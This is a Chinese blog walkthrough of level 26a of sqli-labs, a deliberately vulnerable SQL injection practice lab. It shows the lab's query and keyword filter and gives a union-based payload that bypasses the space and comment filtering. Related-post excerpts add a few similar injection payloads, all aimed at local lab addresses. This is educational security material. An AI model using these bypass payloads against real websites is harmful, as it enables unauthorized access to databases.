sqli-labs ————less -26a

最新推荐文章于 2024-08-25 14:14:12 发布
最新推荐文章于 2024-08-25 14:14:12 发布
阅读量1.1k 收藏
点赞数
分类专栏: 【渗透测试实战】 # Sqli-labs实战
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fly_hps/article/details/80286048
版权

Less-26a

查看一下源代码:

查询语句:

$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
过滤机制: 
function blacklist($id)
{
	$id= preg_replace('/or/i',"", $id);			//strip out OR (non case sensitive)
	$id= preg_replace('/and/i',"", $id);		//Strip out AND (non case sensitive)
	$id= preg_replace('/[\/\*]/',"", $id);		//strip out /*
	$id= preg_replace('/[--]/',"", $id);		//Strip out --
	$id= preg_replace('/[#]/',"", $id);			//Strip out #
	$id= preg_replace('/[\s]/',"", $id);		//Strip out spaces
	$id= preg_replace('/[\s]/',"", $id);		//Strip out spaces
	$id= preg_replace('/[\/\\\\]/',"", $id);		//Strip out slashes
	return $id;
}

这一关与26关的区别在于,这一关中的SQL语句在构建的时候添加了一个括号,同时在SQL语句执行抛出错误后并不在前台页面输出。所以这里报错注入直接排除,不可以使用,但是我们可以使用联合查询。

这里我们可以使用')来闭合前面的(',之后在后面加入自己构造的SQL注入语句,同时在最后仍然需要闭合后面的')才可以,在这个过程中我们仍然需要绕过过滤机制,至于绕过的方法在上一节中已经有所说明了,这里不再重复了,下面给出一个简易payload:

http://192.168.11.136/sqli-labs/Less-26a?id=1')union%a0select%a01,user(),3||('1



FLy_鹏程万里
关注
专栏目录
sqli-labs闯关记录(Less26-Less31)
BROTHERYY的博客
09-08 211
Advanced InjectionsLess-29 WAF PROTECTLess-30 WAF PROTECTLess-31 WAF PROTECT Less 29-31 搭建方法: 1.下载JSPstudy,安装到与PHPstudy同级目录 2.将sqli-labs目录下的tomcat-flies,解压至JSPstudy>www目录下,打开index.jsp,查看路径是否则正确 3.修改JSPstudy端口为8080,PHPstudy端口为8081 4.访问端口8080下的Less-29,
sqli-labs注入——sqli-labs的1-65关闯关指南
qq_51366383的博客
01-27 1745
sqli-labs图片上一共有75关,但是下载的资料都只有65关,所以只写了65关,本文仅是个人想法,如有不对请多谅解。 前面三部分的数据为:security 1、Emails Id ,email_id 2、referers 3、Uagents id,uagent,ip_address,username 4、Users id,username,password password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,
SqliLabs Less26-26a
qq_45785324的博客
07-20 693
SqliLabs Less26 Less26a
SQLi-LABS通关攻略【26-30关】
最新发布
qq_65852138的博客
08-25 719
SQLi-LABS通关攻略【26-30关】
sqli-labs:less-26a(过滤了空格和注释,不能报错注入)
羽的博客
09-14 370
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; char...
sqli-labs 26a
weixin_47300936的博客
09-04 739
mysql会将'2'当作true,然后true and true为true,true则为1。执行的语句则是where id = '2' and '1'='1'执行的语句则是where id = ('2' and '1'='1')后面依次判断出字段名为id,username,password。,查询语句即为where id = ('$id'),查询语句即为where id = '$id'由图可知,回显id为1的信息,即闭合为')即2' and '1'='1。回显会是id为2的信息。回显会是id为1的信息。
SQLi LABS Less 26a 联合注入+布尔盲注
wangyuxiang946的博客
08-15 1万+
SQLi 第26a关,SQLi-LABS Less-26aSQLi-LABS Less 26aSQLiLABS Less26aSQLi Less 26a
sqli-labs 21——40关攻略
weixin_45880717的博客
02-02 1102
Less-21 基于错误的复杂的字符型Cookie注入 base64编码,单引号,报错型,cookie型注入。 本关和less-20相似,只是cookie的uname值经过base64编码了。 登录后页面: 圈出来的地方显然是base64加密过的,解码得到:admin,就是刚才登陆的uname,所以猜测:本题在cookie处加密了字符串, 查看php文件确实如此,所以只需要上传paylaod的时...
SQLi-LABS Less-26&&Less-26a
m0_64898960的博客
04-27 2238
Less-26题目 测试出需要“ ’ ”进行闭合 经过一番尝试,发现or和and继续坐在ban位上,然后空格和一些符号如“+”也坐上了ban位… 可以利用报错函数,便可以不用理会空格的威胁… 查表 Less-26a Less-26a需要使用“ ') ”进行闭合 继续尝试报错注入,发现报错注入已经没有我们想要的东西回显了… 只好根据题目,进行bool盲注即可 Less-26a总结 判断是否存在小括号 一开始怎么尝试都没有答案出来,后来百度原来还有个小括号,然后学习了一下如何判断是否还有小括号…真是裂
sqli-labs Less-26、26a、27、27a、28、28a(sqli-labs闯关指南 26、26a、27、27a、28、28a)—Advanced injection
m0_54899775的博客
12-25 1364
sqli-labs Less-26、26a、27、27a、28、28a(sqli-labs闯关指南 26、26a、27、27a、28、28a)—Advanced injection
sqli-labs-php7环境搭建及通关记录
weixin_44644249的博客
10-28 1794
sqli-labs-php7环境搭建及通关记录 sqli-labs-php7环境搭建及通关记录 学了一个星期的sql注入,将学习过程记录在博客,以后可以查看。 学习视频来自b站的up主:crowsec 视频链接:https://space.bilibili.com/29903122 sqli-labs-php7链接:https://github.com/skyblueee/sqli-labs-php7.git 一. 环境搭建及常用工具 Linux环境搭建(我这里用的是kali linux): 1.启动
Sqli-labs之Less-26和Less-26a
m0_46315342的博客
06-04 2184
                                          &nbs...
SQL注入分析-less-26a
qq_33505576的博客
02-16 428
SQL注入分析-less-26a 1、还是按照提示,在地址栏输入参数。 http://192.168.88.129/sqli-labs-master/Less-26a/?id=1 正常回显,结果如下: 2、SQL注入的一般做法,还是输入单引号试试。 http://192.168.88.129/sqli-labs-master/Less-26a/?id=1%27 这里没有返回结果,也没有报错信息,有两种可能性,一种可能性是查询条件错误;另一种可能性是单引号导致SQL语句没有正常闭合,因为这关利用的
sqli-labs:less-26(过滤了空格和注释)
羽的博客
09-13 216
图片提示过滤了空格和注释 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="tex...
Sqli-labs less 26a
weixin_34032827的博客
08-11 651
Less-26a 这关与26的区别在于,sql语句添加了一个括号,同时在sql语句执行抛出错误后并不在前台页面输出。所有我们排除报错注入,这里依旧是利用union注入。 sql语句为SELECT * FROM users WHERE id=('$id') LIMIT 0,1 我们构造payload: http://127.0.0.1/sqllib/Less-26a/?id=100'...
sqli-labs】 less26a GET- Blind based -All you SPACES and COMMENTS belong to us -String-single quotes...
ajxi63204的博客
01-28 199
这个和less26差不多,空格还是用%a0代替,26过了这个也就简单了 ;%00 可以代替注释,尝试一下 order by 3 http://192.168.136.128/sqli-labs-master/Less-26a/?id=1')%a0oorrder%a0by%a03;%00 order by 4 http://192.168.136.128/s...
SQLi LABS Less 25 联合注入+报错注入+布尔盲注
热门推荐
wangyuxiang946的博客
06-28 1万+
SQLi 第二十五关,SQLi-LABS Less-25,SQLi-LABS Less 25,SQLiLABS Less25,SQLi Less 25
Sqlilabs Less-26-26a Trick with spaces and comments
baynk的博客
03-31 480
Sqlilabs Less-26 Trick with spaces and comments with single quote 手工注入 加quote报错,然后注释没效果,给出的提示看起来似乎是被过滤掉了,用之前手法闭合。然后发现and好像也被过滤了,继续双写试试,但是结果好像空格也被过滤了。。。用了各种编码都不行后,查了资料发现用%a0或者%0b替代(%a0好像是不间断空格,会在html显示...
sqli-less-26-less26a
沐目的博客
04-18 1064
less-26 单引号 GET型 这关就有点过滤的意思了,过滤了上一关的东西,并且把空格和%23给过滤了。如果是ubuntu的话,可以用/**/,%0a等绕过,方便一些。但我的是windows,所以就只能用()了。让后使用||来代替and,用‘1来闭合。 数据库: -1’ || updatexml(1,concat(0x7e,(database()),0x7e),1)||'1 表: 1’|...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值